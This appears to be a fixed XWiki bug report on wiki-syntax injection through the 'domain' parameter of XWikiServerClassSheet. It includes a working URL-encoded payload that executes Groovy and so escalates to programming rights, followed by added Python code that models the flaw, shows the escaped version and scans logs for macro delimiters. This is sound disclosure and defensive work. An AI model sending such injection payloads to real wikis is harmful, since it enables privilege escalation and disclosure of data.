Details
- Bug
- Resolution: Fixed
- Blocker
- 5.3-milestone-2
Description
Steps to reproduce:
- Get the form token (attribute data-xwiki-form-token on any page).
- Open the URL <server>/xwiki/bin/view/Main/?sheet=XWiki.XWikiServerClassSheet&form_token=<form_token>&action=delete&domain=foo%22%2F%7D%7D%7B%7Basync%20async%3D%22true%22%20cached%3D%22false%22%20context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22hello%20from%20groovy!%22)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D, where <server> is the server of the XWiki installation and <form_token> is the form token you obtained in the first step.
Expected result:
The message "Wiki alias "foo"/}}async async="true" cached="false" context="doc.reference"groovy}}println("hello from groovy!"){{/groovy/async" does not exists." is displayed (or any other error message).
Actual result:
The message "Wiki alias "foo" does not exists.hello from groovy!"/}}" is displayed, or in other words, the Groovy code has been executed.
This demonstrates a privilege escalation from view right on XWiki.XWikiServerClassSheet plus view right on a single other document (in this example the main page, but it can be any other page) to programming rights. Because the result of the macro execution is displayed in the response, this can be used not only to modify the wiki but also, quite easily, to disclose all information in the wiki without modifying it.
The affects version is only the version on which I reproduced the issue; this is very likely much older.
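The root cause described above is a request parameter (`domain`) interpolated into wiki syntax without escaping, so the surrounding message turns into a macro invocation. The following is an added example, not code from XWiki or from this issue: a small Python model of the vulnerable message construction beside an escaped version, plus a scanner that reports which macros would actually be parsed and a helper for auditing request logs. The `alias_error_message` function is a hypothetical stand-in for the sheet's Velocity template, and the escaping rule (prefix every character with `~`, the XWiki 2.x escape character) is an assumption chosen for being conservative, not a reproduction of XWiki's own escaper.

```python
import re
from urllib.parse import parse_qs, urlparse


def escape_xwiki21(text: str) -> str:
    """Escape arbitrary text for insertion into XWiki 2.1 syntax.

    Assumption (not XWiki's own implementation): in XWiki 2.x syntax a
    tilde escapes the character that follows it, so prefixing every
    character with '~' guarantees no unescaped '{{' or '}}' survives.
    """
    return "".join("~" + ch for ch in text)


def alias_error_message(alias: str, escape: bool) -> str:
    """Hypothetical stand-in for the sheet's error message template.

    escape=False mirrors the flaw in the report: the request parameter is
    dropped straight into wiki syntax. escape=True is the hardened form.
    """
    shown = escape_xwiki21(alias) if escape else alias
    return f'{{{{error}}}}Wiki alias "{shown}" does not exists.{{{{/error}}}}'


def unescaped_macros(markup: str) -> list:
    """Return the macro names that an XWiki 2.1 parser would see.

    Walks the markup honouring '~' escapes, so '~{~{' is not a macro
    start while a bare '{{' is. Only the names are collected; a closing
    macro is reported with its leading '/'.
    """
    names = []
    i = 0
    while i < len(markup):
        if markup[i] == "~":
            i += 2  # tilde consumes the next character
            continue
        if markup.startswith("{{", i):
            m = re.match(r"\{\{(/?[A-Za-z]+)", markup[i:])
            if m:
                names.append(m.group(1))
        i += 1
    return names


def suspicious_params(url: str) -> list:
    """Audit helper: names of query parameters that carry macro delimiters.

    Intended for scanning access-log URLs; parse_qs percent-decodes the
    values, so '%7B%7B' is checked as '{{'.
    """
    params = parse_qs(urlparse(url).query, keep_blank_values=True)
    return sorted(
        name
        for name, values in params.items()
        if any("{{" in v or "}}" in v for v in values)
    )


if __name__ == "__main__":
    # Constructed sample alias with the same shape as the report's payload.
    alias = 'foo"/}}{{groovy}}println("x"){{/groovy}}'
    print(unescaped_macros(alias_error_message(alias, escape=False)))
    print(unescaped_macros(alias_error_message(alias, escape=True)))
    # Constructed log line: only the 'domain' parameter carries delimiters.
    print(suspicious_params(
        "https://wiki.example/xwiki/bin/view/Main/"
        "?sheet=XWiki.XWikiServerClassSheet&domain=foo%22%7D%7D%7B%7Bgroovy%7D%7D"
    ))
```

With `escape=False` the scanner reports `groovy` alongside the intended `error` macro, which is exactly the condition the report describes; with `escape=True` only `error` and `/error` remain. In a real sheet the same effect is obtained by escaping the parameter with the rendering script service (`$services.rendering.escape`) for the page's syntax before inserting it into the message, rather than building the markup by string concatenation.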
Issue Links
- is caused by: XWIKI-9516 Create a new Wiki API that replaces xwiki-platform-wiki-manager and xwiki-platform-workspace (Closed)
- relates to: XWIKI-19757 Possible wiki injection through translation macro parameters located in FlamingoThemesCode.WebHomeSheet (Closed)
- links to